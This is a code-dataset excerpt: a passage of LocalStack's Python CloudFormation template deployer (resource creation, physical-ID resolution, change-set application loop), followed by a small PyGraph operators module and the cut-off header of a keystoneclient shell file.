            api_id = resolve_refs_recursively(stack_name, resource_props['RestApiId'], resources)
            res_id = resolve_refs_recursively(stack_name, resource_props['ResourceId'], resources)
            kwargs = {}
            if integration.get('Uri'):
                uri = resolve_refs_recursively(stack_name, integration.get('Uri'), resources)
                # Moto has a validate method on Uri for integration_type "HTTP" | "HTTP_PROXY" that does not accept
                # Uri value without path, we need to add path ("/") if not exists
                if integration.get('Type') in ['HTTP', 'HTTP_PROXY']:
                    rs = urlparse(uri)
                    if not rs.path:
                        uri = '{}/'.format(uri)
                kwargs['uri'] = uri
            if integration.get('IntegrationHttpMethod'):
                kwargs['integrationHttpMethod'] = integration['IntegrationHttpMethod']
            apigateway.put_integration(
                restApiId=api_id,
                resourceId=res_id,
                httpMethod=resource_props['HttpMethod'],
                type=integration['Type'],
                **kwargs
            )
        responses = resource_props.get('MethodResponses') or []
        for response in responses:
            api_id = resolve_refs_recursively(stack_name, resource_props['RestApiId'], resources)
            res_id = resolve_refs_recursively(stack_name, resource_props['ResourceId'], resources)
            apigateway.put_method_response(restApiId=api_id, resourceId=res_id,
                httpMethod=resource_props['HttpMethod'], statusCode=str(response['StatusCode']),
                responseParameters=response.get('ResponseParameters', {}))
    elif resource_type == 'ApiGateway::RestApi':
        # import an OpenAPI/Swagger body into the freshly created API, if given
        body = resource_props.get('Body')
        if body:
            client = aws_stack.connect_to_service('apigateway')
            body = json.dumps(body) if isinstance(body, dict) else body
            client.put_rest_api(restApiId=result['id'], body=to_bytes(body))
    elif resource_type == 'SNS::Topic':
        subscriptions = resource_props.get('Subscription', [])
        for subscription in subscriptions:
            if is_none_or_empty_value(subscription):
                continue
            endpoint = resolve_refs_recursively(stack_name, subscription['Endpoint'], resources)
            topic_arn = retrieve_topic_arn(resource_props['TopicName'])
            aws_stack.connect_to_service('sns').subscribe(
                TopicArn=topic_arn, Protocol=subscription['Protocol'], Endpoint=endpoint
            )
    elif resource_type == 'S3::Bucket':
        tags = resource_props.get('Tags')
        if tags:
            aws_stack.connect_to_service('s3').put_bucket_tagging(
                Bucket=resource_props['BucketName'], Tagging={'TagSet': tags})
    elif resource_type == 'IAM::Role':
        # create the inline policies declared on the role
        policies = resource_props.get('Policies', [])
        for policy in policies:
            iam = aws_stack.connect_to_service('iam')
            pol_name = policy['PolicyName']
            doc = dict(policy['PolicyDocument'])
            doc['Version'] = doc.get('Version') or IAM_POLICY_VERSION
            statements = doc['Statement'] if isinstance(doc['Statement'], list) else [doc['Statement']]
            for statement in statements:
                if isinstance(statement.get('Resource'), list):
                    # filter out empty resource strings
                    statement['Resource'] = [r for r in statement['Resource'] if r]
            doc = json.dumps(doc)
            LOG.debug('Running put_role_policy(...) for IAM::Role policy: %s %s %s' %
                (resource_props['RoleName'], pol_name, doc))
            iam.put_role_policy(RoleName=resource_props['RoleName'], PolicyName=pol_name, PolicyDocument=doc)
    elif resource_type == 'IAM::Policy':
        # associate policies with users, groups, roles
        groups = resource_props.get('Groups', [])
        roles = resource_props.get('Roles', [])
        users = resource_props.get('Users', [])
        policy_arn = aws_stack.policy_arn(resource_props.get('PolicyName'))
        iam = aws_stack.connect_to_service('iam')
        for group in groups:
            iam.attach_group_policy(GroupName=group, PolicyArn=policy_arn)
        for role in roles:
            iam.attach_role_policy(RoleName=role, PolicyArn=policy_arn)
        for user in users:
            iam.attach_user_policy(UserName=user, PolicyArn=policy_arn)
    elif resource_type == 'IAM::InstanceProfile':
        if resource_props.get('Roles', []):
            # note: only the first role is attached to the instance profile
            iam = aws_stack.connect_to_service('iam')
            iam.add_role_to_instance_profile(
                InstanceProfileName=resource_props['InstanceProfileName'],
                RoleName=resource_props['Roles'][0]
            )
def is_none_or_empty_value(value):
    """True for falsy values (None, '', {}, ...) and the "AWS::NoValue" placeholder."""
    if value == PLACEHOLDER_AWS_NO_VALUE:
        return True
    return not value
def determine_resource_physical_id(resource_id, resources=None, stack=None, attribute=None, stack_name=None):
    """Determine the physical ID (or the given identity `attribute`) of a stack resource.

    Resolution order: resource model class, then hardcoded per-type rules,
    then the stored 'PhysicalResourceId', then a generic attribute extraction.
    Returns None if nothing can be determined.
    """
    resources = resources or stack.resources
    stack_name = stack_name or stack.stack_name
    resource = resources.get(resource_id, {})
    if not resource:
        return
    resource_type = resource.get('Type') or ''
    resource_type = re.sub('^AWS::', '', resource_type)
    resource_props = resource.get('Properties', {})
    # determine result from resource class
    canonical_type = canonical_resource_type(resource_type)
    resource_class = RESOURCE_MODELS.get(canonical_type)
    if resource_class:
        resource_inst = resource_class(resource)
        resource_inst.fetch_state_if_missing(stack_name=stack_name, resources=resources)
        result = resource_inst.get_physical_resource_id(attribute=attribute)
        if result:
            return result
    # TODO: put logic into resource-specific model classes
    if resource_type == 'ApiGateway::RestApi':
        result = resource_props.get('id')
        if result:
            return result
    elif resource_type == 'ApiGateway::Stage':
        return resource_props.get('StageName')
    elif resource_type == 'AppSync::DataSource':
        return resource_props.get('DataSourceArn')
    elif resource_type == 'KinesisFirehose::DeliveryStream':
        return aws_stack.firehose_stream_arn(resource_props.get('DeliveryStreamName'))
    elif resource_type == 'StepFunctions::StateMachine':
        return aws_stack.state_machine_arn(resource_props.get('StateMachineName')) # returns ARN in AWS
    elif resource_type == 'S3::Bucket':
        if attribute == 'Arn':
            return aws_stack.s3_bucket_arn(resource_props.get('BucketName'))
        return resource_props.get('BucketName') # Note: "Ref" returns bucket name in AWS
    elif resource_type == 'IAM::Role':
        if attribute == 'Arn':
            return aws_stack.role_arn(resource_props.get('RoleName'))
        return resource_props.get('RoleName')
    elif resource_type == 'SecretsManager::Secret':
        arn = get_secret_arn(resource_props.get('Name')) or ''
        if attribute == 'Arn':
            return arn
        # "Ref" resolves to the trailing segment of the secret ARN
        return arn.split(':')[-1]
    elif resource_type == 'IAM::Policy':
        if attribute == 'Arn':
            return aws_stack.policy_arn(resource_props.get('PolicyName'))
        return resource_props.get('PolicyName')
    elif resource_type == 'DynamoDB::Table':
        table_name = resource_props.get('TableName')
        if table_name:
            # NOTE(review): both branches return the table name - the "Ref"
            # check is currently redundant
            if attribute == 'Ref':
                return table_name # Note: "Ref" returns table name in AWS
            return table_name
    elif resource_type == 'Logs::LogGroup':
        return resource_props.get('LogGroupName')
    res_id = resource.get('PhysicalResourceId')
    if res_id and attribute in [None, 'Ref', 'PhysicalResourceId']:
        return res_id
    result = extract_resource_attribute(resource_type, {}, attribute or 'PhysicalResourceId',
        stack_name=stack_name, resource_id=resource_id, resource=resource, resources=resources)
    if result is not None:
        # note that value could be an empty string here (in case of Parameter values)
        return result
    LOG.info('Unable to determine PhysicalResourceId for "%s" resource, ID "%s"' % (resource_type, resource_id))
def update_resource_details(stack, resource_id, details, action=None):
    """Record deployment result `details` (e.g., physical IDs) on the stack resource."""
    resource = stack.resources.get(resource_id, {})
    if not resource:
        return
    res_type = re.sub('^AWS::', '', resource.get('Type') or '')
    props = resource.get('Properties', {})
    if res_type == 'ApiGateway::RestApi':
        props['id'] = details['id']
    # per-type extractors pulling the physical resource ID out of `details`
    physical_id_extractors = {
        'KMS::Key': lambda d: d['KeyMetadata']['KeyId'],
        'EC2::SecurityGroup': lambda d: d['GroupId'],
        'IAM::InstanceProfile': lambda d: d['InstanceProfile']['InstanceProfileName'],
        'Events::EventBus': lambda d: d['EventBusArn'],
        'StepFunctions::Activity': lambda d: d['activityArn'],
        'ApiGateway::Model': lambda d: d['id'],
        'EC2::VPC': lambda d: d['Vpc']['VpcId'],
        'EC2::Subnet': lambda d: d['Subnet']['SubnetId'],
        'EC2::RouteTable': lambda d: d['RouteTable']['RouteTableId'],
        'EC2::Route': lambda d: generate_route_id(
            props['RouteTableId'],
            props.get('DestinationCidrBlock', ''),
            props.get('DestinationIpv6CidrBlock')),
    }
    extractor = physical_id_extractors.get(res_type)
    if extractor:
        resource['PhysicalResourceId'] = extractor(details)
    elif res_type == 'EC2::Instance' and action == 'CREATE':
        # boto3 "resource" API returns a list of created instance objects
        resource['PhysicalResourceId'] = details[0].id
    if isinstance(details, MotoCloudFormationModel):
        # fallback: keep track of moto resource status
        stack.moto_resource_statuses[resource_id] = details
def add_default_resource_props(resource, stack_name, resource_name=None,
        resource_id=None, update=False, existing_resources=None):
    """ Apply some fixes to resource props which otherwise cause deployments to fail """
    res_type = resource['Type']
    props = resource['Properties'] = resource.get('Properties', {})
    existing_resources = existing_resources or {}
    # fallback name of the form "<stack>-<resource>-<uid>" for unnamed resources
    def _generate_res_name():
        return '%s-%s-%s' % (stack_name, resource_name or resource_id, short_uid())
    # TODO: move logic below into resource classes!
    if res_type == 'AWS::Lambda::EventSourceMapping' and not props.get('StartingPosition'):
        props['StartingPosition'] = 'LATEST'
    elif res_type == 'AWS::Logs::LogGroup' and not props.get('LogGroupName') and resource_name:
        props['LogGroupName'] = resource_name
    elif res_type == 'AWS::Lambda::Function' and not props.get('FunctionName'):
        # stack name is truncated to keep within the function name length limit
        props['FunctionName'] = '{}-lambda-{}'.format(stack_name[:45], short_uid())
    elif res_type == 'AWS::SNS::Topic' and not props.get('TopicName'):
        props['TopicName'] = 'topic-%s' % short_uid()
    elif res_type == 'AWS::SQS::Queue' and not props.get('QueueName'):
        props['QueueName'] = 'queue-%s' % short_uid()
    elif res_type == 'AWS::SQS::QueuePolicy' and not resource.get('PhysicalResourceId'):
        resource['PhysicalResourceId'] = _generate_res_name()
    elif res_type == 'AWS::IAM::ManagedPolicy' and not resource.get('ManagedPolicyName'):
        resource['ManagedPolicyName'] = _generate_res_name()
    elif res_type == 'AWS::ApiGateway::RestApi' and not props.get('Name'):
        props['Name'] = _generate_res_name()
    elif res_type == 'AWS::ApiGateway::Stage' and not props.get('StageName'):
        props['StageName'] = 'default'
    elif res_type == 'AWS::ApiGateway::ApiKey' and not props.get('Name'):
        props['Name'] = _generate_res_name()
    elif res_type == 'AWS::ApiGateway::UsagePlan' and not props.get('UsagePlanName'):
        props['UsagePlanName'] = _generate_res_name()
    elif res_type == 'AWS::ApiGateway::Model' and not props.get('Name'):
        props['Name'] = _generate_res_name()
    elif res_type == 'AWS::DynamoDB::Table':
        update_dynamodb_index_resource(resource)
        props['TableName'] = props.get('TableName') or _generate_res_name()
    elif res_type == 'AWS::S3::Bucket' and not props.get('BucketName'):
        # reuse the name of an already-existing bucket resource, if available
        existing_bucket = existing_resources.get(resource_id) or {}
        bucket_name = existing_bucket.get('Properties', {}).get('BucketName') or _generate_res_name()
        props['BucketName'] = s3_listener.normalize_bucket_name(bucket_name)
    elif res_type == 'AWS::StepFunctions::StateMachine' and not props.get('StateMachineName'):
        props['StateMachineName'] = _generate_res_name()
    elif res_type == 'AWS::CloudFormation::Stack' and not props.get('StackName'):
        props['StackName'] = _generate_res_name()
    elif res_type == 'AWS::EC2::SecurityGroup':
        props['GroupName'] = props.get('GroupName') or _generate_res_name()
    elif res_type == 'AWS::IAM::InstanceProfile':
        props['InstanceProfileName'] = props.get('InstanceProfileName') or _generate_res_name()
    elif res_type == 'AWS::KMS::Key':
        tags = props['Tags'] = props.get('Tags', [])
        existing = [t for t in tags if t['Key'] == 'localstack-key-id']
        if not existing:
            # append tags, to allow us to determine in service_models.py whether this key is already deployed
            tags.append({'Key': 'localstack-key-id', 'Value': short_uid()})
    # generate default names for certain resource types
    default_attrs = (('AWS::IAM::Role', 'RoleName'), ('AWS::Events::Rule', 'Name'))
    for entry in default_attrs:
        if res_type == entry[0] and not props.get(entry[1]):
            if not resource_id:
                # derive a stable ID from the (canonicalized) properties
                resource_id = canonical_json(json_safe(props))
                resource_id = md5(resource_id)
            props[entry[1]] = 'cf-%s-%s' % (stack_name, resource_id)
def update_dynamodb_index_resource(resource):
    """Ensure GSIs of PAY_PER_REQUEST tables carry a ProvisionedThroughput.

    The backing implementation requires a ProvisionedThroughput entry even
    for on-demand (PAY_PER_REQUEST) tables, so fill in a dummy value for
    every global secondary index that does not define one.
    Mutates `resource` in place; safe to call for resources without a
    'Properties' key (the original raised AttributeError in that case).
    """
    props = resource.get('Properties') or {}
    if props.get('BillingMode') == 'PAY_PER_REQUEST':
        for glob_index in props.get('GlobalSecondaryIndexes', []):
            # only add the dummy throughput if none is defined yet
            if not glob_index.get('ProvisionedThroughput'):
                glob_index['ProvisionedThroughput'] = {'ReadCapacityUnits': 99, 'WriteCapacityUnits': 99}
# -----------------------
# MAIN TEMPLATE DEPLOYER
# -----------------------
class TemplateDeployer(object):
    """Drives CloudFormation stack operations (create/update/delete).

    Resource changes are applied in a retry loop (see
    do_apply_changes_in_loop) so that dependencies between resources
    (Ref / Fn::GetAtt / DependsOn) can be resolved incrementally.
    """
    def __init__(self, stack):
        self.stack = stack
    @property
    def resources(self):
        # map of logical resource ID -> resource details for this stack
        return self.stack.resources
    @property
    def stack_name(self):
        return self.stack.stack_name
    # ------------------
    # MAIN ENTRY POINTS
    # ------------------
    def deploy_stack(self):
        """Create all stack resources; sets CREATE_FAILED and re-raises on error."""
        self.stack.set_stack_status('CREATE_IN_PROGRESS')
        try:
            self.apply_changes(self.stack, self.stack, stack_name=self.stack.stack_name,
                initialize=True, action='CREATE')
        except Exception as e:
            LOG.info('Unable to create stack %s: %s' % (self.stack.stack_name, e))
            self.stack.set_stack_status('CREATE_FAILED')
            raise
    def apply_change_set(self, change_set):
        """Execute the given change set against its associated stack."""
        action = 'CREATE'
        change_set.stack.set_stack_status('%s_IN_PROGRESS' % action)
        try:
            self.apply_changes(change_set.stack, change_set, stack_name=change_set.stack_name, action=action)
        except Exception as e:
            LOG.info('Unable to apply change set %s: %s' % (change_set.metadata.get('ChangeSetName'), e))
            change_set.metadata['Status'] = '%s_FAILED' % action
            self.stack.set_stack_status('%s_FAILED' % action)
            raise
    def update_stack(self, new_stack):
        """Update this deployer's stack to match the new stack's template."""
        self.stack.set_stack_status('UPDATE_IN_PROGRESS')
        # apply changes
        self.apply_changes(self.stack, new_stack, stack_name=self.stack.stack_name, action='UPDATE')
    def delete_stack(self):
        """Delete all stack resources and mark the stack DELETE_COMPLETE."""
        self.stack.set_stack_status('DELETE_IN_PROGRESS')
        stack_resources = list(self.stack.resources.values())
        stack_name = self.stack.stack_name
        # operate on clones, so deletion bookkeeping does not mutate stored state
        resources = dict([(r['LogicalResourceId'], common.clone_safe(r)) for r in stack_resources])
        for key, resource in resources.items():
            resource['Properties'] = resource.get('Properties', common.clone_safe(resource))
            resource['ResourceType'] = resource.get('ResourceType') or resource.get('Type')
        for resource_id, resource in resources.items():
            # TODO: cache condition value in resource details on deployment and use cached value here
            if evaluate_resource_condition(resource, stack_name, resources):
                delete_resource(resource_id, resources, stack_name)
        # update status
        self.stack.set_stack_status('DELETE_COMPLETE')
    # ----------------------------
    # DEPENDENCY RESOLUTION UTILS
    # ----------------------------
    def is_deployable_resource(self, resource):
        """Return True if a deployment handler (or moto fallback) exists for the type."""
        resource_type = get_resource_type(resource)
        entry = get_deployment_config(resource_type)
        if entry is None and resource_type not in ['Parameter', None]:
            # fall back to moto resource creation (TODO: remove in the future)
            long_res_type = canonical_resource_type(resource_type)
            if long_res_type in parsing.MODEL_MAP:
                return True
            LOG.warning('Unable to deploy resource type "%s": %s' % (resource_type, resource))
        return bool(entry and entry.get(ACTION_CREATE))
    def is_deployed(self, resource):
        """Return True if the resource already exists in the backend."""
        resource_status = {}
        resource_id = resource['LogicalResourceId']
        details = retrieve_resource_details(resource_id, resource_status, self.resources, self.stack_name)
        return bool(details)
    def is_updateable(self, resource):
        """ Return whether the given resource can be updated or not. """
        if not self.is_deployable_resource(resource) or not self.is_deployed(resource):
            return False
        resource_type = get_resource_type(resource)
        return resource_type in UPDATEABLE_RESOURCES
    def all_resource_dependencies_satisfied(self, resource):
        # True when no deployable dependency is still undeployed
        unsatisfied = self.get_unsatisfied_dependencies(resource)
        return not unsatisfied
    def get_unsatisfied_dependencies(self, resource):
        res_deps = self.get_resource_dependencies(resource)
        return self.get_unsatisfied_dependencies_for_resources(res_deps, resource)
    def get_unsatisfied_dependencies_for_resources(self, resources, depending_resource=None, return_first=True):
        """Return the subset of `resources` that is deployable but not yet
        deployed (at most one entry when return_first is set)."""
        result = {}
        for resource_id, resource in iteritems(resources):
            if self.is_deployable_resource(resource):
                if not self.is_deployed(resource):
                    LOG.debug('Dependency for resource %s not yet deployed: %s %s' %
                        (depending_resource, resource_id, resource))
                    result[resource_id] = resource
                    if return_first:
                        break
        return result
    def get_resource_dependencies(self, resource):
        """Find resources this one depends on via Ref / Fn::GetAtt / DependsOn,
        detected by string search over the serialized raw template."""
        result = {}
        # Note: using the original, unmodified template here to preserve Ref's ...
        raw_resources = self.stack.template_original['Resources']
        raw_resource = raw_resources[resource['LogicalResourceId']]
        dumped = json.dumps(common.json_safe(raw_resource))
        for other_id, other in raw_resources.items():
            if resource != other:
                # TODO: traverse dict instead of doing string search!
                search1 = '{"Ref": "%s"}' % other_id
                search2 = '{"Fn::GetAtt": ["%s", ' % other_id
                if search1 in dumped or search2 in dumped:
                    result[other_id] = other
                if other_id in resource.get('DependsOn', []):
                    result[other_id] = other
        return result
    # -----------------
    # DEPLOYMENT UTILS
    # -----------------
    def add_default_resource_props(self, resources=None):
        """Fill in generated default names/properties for all resources."""
        resources = resources or self.resources
        for resource_id, resource in resources.items():
            add_default_resource_props(resource, self.stack_name, resource_id=resource_id)
    def init_resource_status(self, resources=None, stack=None, action='CREATE'):
        """Mark all resources as <action>_IN_PROGRESS."""
        resources = resources or self.resources
        stack = stack or self.stack
        for resource_id, resource in resources.items():
            stack.set_resource_status(resource_id, '%s_IN_PROGRESS' % action)
    def update_resource_details(self, resource_id, result, stack=None, action='CREATE'):
        """Store the deployment result, assign the physical resource ID and
        mark the resource <action>_COMPLETE. Returns the physical ID."""
        stack = stack or self.stack
        # update resource state
        update_resource_details(stack, resource_id, result, action)
        # update physical resource id
        resource = stack.resources[resource_id]
        physical_id = resource.get('PhysicalResourceId')
        physical_id = physical_id or determine_resource_physical_id(resource_id, stack=stack)
        if not resource.get('PhysicalResourceId') or action == 'UPDATE':
            resource['PhysicalResourceId'] = physical_id
        # set resource status
        stack.set_resource_status(resource_id, '%s_COMPLETE' % action, physical_res_id=physical_id)
        return physical_id
    def get_change_config(self, action, resource, change_set_id=None):
        """Build a change entry (API response shape) for the given resource."""
        return {
            'Type': 'Resource',
            'ResourceChange': {
                'Action': action,
                'LogicalResourceId': resource.get('LogicalResourceId'),
                'PhysicalResourceId': resource.get('PhysicalResourceId'),
                'ResourceType': resource.get('Type'),
                'Replacement': 'False',
                'ChangeSetId': change_set_id
            }
        }
    def resource_config_differs(self, resource_new):
        """ Return whether the given resource properties differ from the existing config (for stack updates). """
        # NOTE: returns None (falsy) when the configs are identical
        resource_old = self.resources[resource_new['LogicalResourceId']]
        props_old = resource_old['Properties']
        props_new = resource_new['Properties']
        ignored_keys = ['LogicalResourceId', 'PhysicalResourceId']
        old_keys = set(props_old.keys()) - set(ignored_keys)
        new_keys = set(props_new.keys()) - set(ignored_keys)
        if old_keys != new_keys:
            return True
        for key in old_keys:
            if props_old[key] != props_new[key]:
                return True
    def merge_properties(self, resource_id, old_stack, new_stack):
        """Copy the new resource definition over the old one: new Properties
        win, other attributes keep their old values when present."""
        old_resources = old_stack.template['Resources']
        new_resources = new_stack.template['Resources']
        new_resource = new_resources[resource_id]
        old_resource = old_resources[resource_id] = old_resources.get(resource_id) or {}
        for key, value in new_resource.items():
            if key == 'Properties':
                continue
            old_resource[key] = old_resource.get(key, value)
        old_res_props = old_resource['Properties'] = old_resource.get('Properties', {})
        for key, value in new_resource['Properties'].items():
            old_res_props[key] = value
        # overwrite original template entirely
        old_stack.template_original['Resources'][resource_id] = new_stack.template_original['Resources'][resource_id]
    def apply_parameter_changes(self, old_stack, new_stack):
        """Merge parameter values with increasing precedence: old stack values,
        new template defaults, new stack metadata, change set parameters."""
        parameters = {p['ParameterKey']: p['ParameterValue'] for p in old_stack.metadata['Parameters']}
        for key, value in new_stack.template['Parameters'].items():
            parameters[key] = value.get('Default', parameters.get(key))
        parameters.update({p['ParameterKey']: p['ParameterValue'] for p in new_stack.metadata['Parameters']})
        for change_set in new_stack.change_sets:
            # NOTE(review): here the whole parameter dict is stored as the
            # value (not just ParameterValue) -- confirm this is intended
            parameters.update({p['ParameterKey']: p for p in change_set.metadata['Parameters']})
        old_stack.metadata['Parameters'] = [
            {'ParameterKey': k, 'ParameterValue': v}
            for k, v in parameters.items() if v
        ]
    def construct_changes(self, existing_stack, new_stack, initialize=False,
            change_set_id=None, append_to_changeset=False):
        """Diff old vs. new resources into Remove/Add/Modify change entries."""
        from localstack.services.cloudformation.cloudformation_api import StackChangeSet
        old_resources = existing_stack.template['Resources']
        new_resources = new_stack.template['Resources']
        deletes = [val for key, val in old_resources.items() if key not in new_resources]
        adds = [val for key, val in new_resources.items() if initialize or key not in old_resources]
        modifies = [val for key, val in new_resources.items() if key in old_resources]
        changes = []
        for action, items in (('Remove', deletes), ('Add', adds), ('Modify', modifies)):
            for item in items:
                item['Properties'] = item.get('Properties', {})
                change = self.get_change_config(action, item, change_set_id=change_set_id)
                changes.append(change)
        # append changes to change set
        if append_to_changeset and isinstance(new_stack, StackChangeSet):
            new_stack.changes.extend(changes)
        return changes
    def apply_changes(self, existing_stack, new_stack, stack_name,
            change_set_id=None, initialize=False, action=None):
        """Compute and apply the changes that bring existing_stack in line
        with new_stack; raises NoStackUpdates when nothing would change."""
        old_resources = existing_stack.template['Resources']
        new_resources = new_stack.template['Resources']
        action = action or 'CREATE'
        self.init_resource_status(old_resources, action='UPDATE')
        # apply parameter changes to existing stack
        self.apply_parameter_changes(existing_stack, new_stack)
        # construct changes
        changes = self.construct_changes(existing_stack, new_stack,
            initialize=initialize, change_set_id=change_set_id)
        # check if we have actual changes in the stack, and prepare properties
        contains_changes = False
        for change in changes:
            res_action = change['ResourceChange']['Action']
            resource = new_resources.get(change['ResourceChange']['LogicalResourceId'])
            if res_action != 'Modify' or self.resource_config_differs(resource):
                contains_changes = True
            if res_action in ['Modify', 'Add']:
                self.merge_properties(resource['LogicalResourceId'], existing_stack, new_stack)
        if not contains_changes:
            raise NoStackUpdates('No updates are to be performed.')
        # merge stack outputs
        existing_stack.template['Outputs'].update(new_stack.template.get('Outputs', {}))
        # start deployment loop
        return self.apply_changes_in_loop(changes, existing_stack, stack_name, action=action, new_stack=new_stack)
    def apply_changes_in_loop(self, changes, stack, stack_name, action=None, new_stack=None):
        """Run the deployment loop in a background worker thread, updating
        stack (and change set) status when it finishes."""
        from localstack.services.cloudformation.cloudformation_api import StackChangeSet
        def _run(*args):
            try:
                self.do_apply_changes_in_loop(changes, stack, stack_name)
                status = '%s_COMPLETE' % action
            except Exception as e:
                LOG.debug('Error applying changes for CloudFormation stack "%s": %s %s' % (
                    stack.stack_name, e, traceback.format_exc()))
                status = '%s_FAILED' % action
            stack.set_stack_status(status)
            if isinstance(new_stack, StackChangeSet):
                new_stack.metadata['Status'] = status
                new_stack.metadata['ExecutionStatus'] = (
                    'EXECUTE_FAILED' if 'FAILED' in status else 'EXECUTE_COMPLETE')
                new_stack.metadata['StatusReason'] = 'Deployment %s' % (
                    'failed' if 'FAILED' in status else 'succeeded')
        # run deployment in background loop, to avoid client network timeouts
        return start_worker_thread(_run)
    def do_apply_changes_in_loop(self, changes, stack, stack_name):
        # apply changes in a retry loop, to resolve resource dependencies and converge to the target state
        changes_done = []
        max_iters = 30
        new_resources = stack.resources
        # apply default props before running the loop
        for resource_id, resource in new_resources.items():
            add_default_resource_props(resource, stack.stack_name,
                resource_id=resource_id, existing_resources=new_resources)
        # start deployment loop
        for i in range(max_iters):
            j = 0
            updated = False
            while j < len(changes):
                change = changes[j]
                res_change = change['ResourceChange']
                action = res_change['Action']
                is_add_or_modify = action in ['Add', 'Modify']
                resource_id = res_change['LogicalResourceId']
                try:
                    if is_add_or_modify:
                        resource = new_resources[resource_id]
                        should_deploy = self.prepare_should_deploy_change(
                            resource_id, change, stack, new_resources)
                        LOG.debug('Handling "%s" for resource "%s" (%s/%s) type "%s" in loop iteration %s' % (
                            action, resource_id, j + 1, len(changes), res_change['ResourceType'], i + 1))
                        if not should_deploy:
                            del changes[j]
                            continue
                        if not self.all_resource_dependencies_satisfied(resource):
                            j += 1
                            continue
                    self.apply_change(change, stack, new_resources, stack_name=stack_name)
                    changes_done.append(change)
                    del changes[j]
                    updated = True
                except DependencyNotYetSatisfied as e:
                    LOG.debug('Dependencies for "%s" not yet satisfied, retrying in next loop: %s' % (resource_id, e))
                    j += 1
            if not changes:
                break
            if not updated:
                # no progress in a whole pass -> unresolvable dependencies
                raise Exception('Resource deployment loop completed, pending resource changes: %s' % changes)
        # clean up references to deleted resources in stack
        deletes = [c for c in changes_done if c['ResourceChange']['Action'] == 'Remove']
        for delete in deletes:
            stack.template['Resources'].pop(delete['ResourceChange']['LogicalResourceId'], None)
        return changes_done
    def prepare_should_deploy_change(self, resource_id, change, stack, new_resources):
        """Resolve references in the resource and decide whether the change
        still needs to be deployed; may flip Modify -> Add for resources
        that do not exist yet. Returns falsy to drop the change."""
        resource = new_resources[resource_id]
        res_change = change['ResourceChange']
        action = res_change['Action']
        # check resource condition, if present
        if not evaluate_resource_condition(resource, stack.stack_name, new_resources):
            LOG.debug('Skipping deployment of "%s", as resource condition evaluates to false' % resource_id)
            return
        # resolve refs in resource details
        resolve_refs_recursively(stack.stack_name, resource, new_resources)
        if action in ['Add', 'Modify']:
            is_deployed = self.is_deployed(resource)
            if action == 'Modify' and not is_deployed:
                action = res_change['Action'] = 'Add'
            if action == 'Add':
                if not self.is_deployable_resource(resource) or is_deployed:
                    return False
            if action == 'Modify' and not self.is_updateable(resource):
                LOG.debug('Action "update" not yet implemented for CF resource type %s' % resource.get('Type'))
                return False
        return True
    def apply_change(self, change, old_stack, new_resources, stack_name):
        """Execute a single Add/Remove/Modify change and record the result."""
        change_details = change['ResourceChange']
        action = change_details['Action']
        resource_id = change_details['LogicalResourceId']
        resource = new_resources[resource_id]
        if not evaluate_resource_condition(resource, stack_name, new_resources):
            return
        # execute resource action
        # NOTE(review): `result` would be unbound for any action other than
        # Add/Remove/Modify -- callers only pass these three actions
        if action == 'Add':
            result = deploy_resource(resource_id, new_resources, stack_name)
        elif action == 'Remove':
            result = delete_resource(resource_id, old_stack.resources, stack_name)
        elif action == 'Modify':
            result = update_resource(resource_id, new_resources, stack_name)
        # update resource status and physical resource id
        stack_action = {'Add': 'CREATE', 'Remove': 'DELETE', 'Modify': 'UPDATE'}.get(action)
        self.update_resource_details(resource_id, result, stack=old_stack, action=stack_action)
        return result
c89e7821b2b450715e77bbe28b3d9de999e8117d | 793 | py | Python | src/postfix/operators.py | theProgrammerDavid/PyGraph | e6a011c75352d15c727dca3d1e33cafa62ef0e81 | [
"MIT"
] | 1 | 2017-11-07T15:59:06.000Z | 2017-11-07T15:59:06.000Z | src/postfix/operators.py | theProgrammerDavid/PyGraph | e6a011c75352d15c727dca3d1e33cafa62ef0e81 | [
"MIT"
] | 2 | 2021-03-31T14:55:56.000Z | 2021-03-31T15:01:14.000Z | src/postfix/operators.py | theProgrammerDavid/PyGraph | e6a011c75352d15c727dca3d1e33cafa62ef0e81 | [
"MIT"
] | 2 | 2019-12-19T17:44:23.000Z | 2020-01-19T08:58:02.000Z | '''
Defines multiple operators and their actions.
'''
# Binary operators keyed by their single-character symbol. Each entry maps
# to its precedence ("priority") and a two-argument evaluation function.
# NOTE(review): lower "priority" values appear to bind tighter ("^" is 0,
# "/" is 1, ... "-" is 4) -- confirm against the expression evaluator.
BINARY_OPERATORS = {
    "+":{"priority":3, "func":lambda x,y:x+y},
    "-":{"priority":4, "func":lambda x,y:x-y},
    "*":{"priority":2, "func":lambda x,y:x*y},
    "/":{"priority":1, "func":lambda x,y:x/y},
    "^":{"priority":0, "func":lambda x,y:x**y}
}
# Unary operators (currently only negation); same structure, but each
# "func" takes a single argument.
UNARY_OPERATORS = {
    "-": {"priority":-1, "func":lambda x:-x}
}
def add_binary_operator(char, func, priority, binary = True):
    """Register a custom operator under the one-character symbol `char`.

    Despite the name, unary operators can be registered as well by passing
    ``binary=False``; in that case `func` takes a single argument instead
    of two. An existing operator with the same symbol is overwritten.

    Raises:
        ValueError: if `char` is not exactly one character long.
    """
    if len(char) != 1:
        raise ValueError("Identifier for an operator must be just a character!")
    entry = {"priority": priority, "func": func}
    table = BINARY_OPERATORS if binary else UNARY_OPERATORS
    table[char] = entry
| 26.433333 | 80 | 0.553594 |
4c53cf79a6634dd6ed00790d9fdf45f667105e42 | 18,488 | py | Python | keystoneclient/v2_0/shell.py | CiscoSystems/python-keystoneclient | 1130dd70dfffb67636dac2f8cd53804f1f9fb894 | [
"Apache-1.1"
] | null | null | null | keystoneclient/v2_0/shell.py | CiscoSystems/python-keystoneclient | 1130dd70dfffb67636dac2f8cd53804f1f9fb894 | [
"Apache-1.1"
] | null | null | null | keystoneclient/v2_0/shell.py | CiscoSystems/python-keystoneclient | 1130dd70dfffb67636dac2f8cd53804f1f9fb894 | [
"Apache-1.1"
] | null | null | null | # Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC.
# Copyright 2011 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import functools
import getpass

from keystoneclient.v2_0 import client
from keystoneclient import utils
# Client class instantiated by the generic shell machinery for v2.0 commands
CLIENT_CLASS = client.Client
def require_service_catalog(f):
